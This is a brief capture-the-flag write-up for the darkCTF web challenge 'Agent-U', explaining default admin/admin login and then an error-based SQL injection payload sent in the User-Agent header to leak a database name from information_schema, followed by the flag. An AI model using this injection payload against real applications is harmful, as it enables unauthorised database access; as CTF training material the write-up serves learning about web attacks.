Web/Agent-U
395 points
Agent U stole a database from my company but I don’t know which one. Can u help me to find it?
http://agent.darkarmy.xyz/
flag format darkCTF{databasename}
Solution
From the source we can get info, that default credentials are admin/admin.
Site after login shows my user agent, so my first idea was to perform sql injection through my user agent.
After few attempts I ended up finally with below user agent setup ;-)
', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .
BINGO!
darkCTF{ag3ntu1sv3ryt3l3nt3d}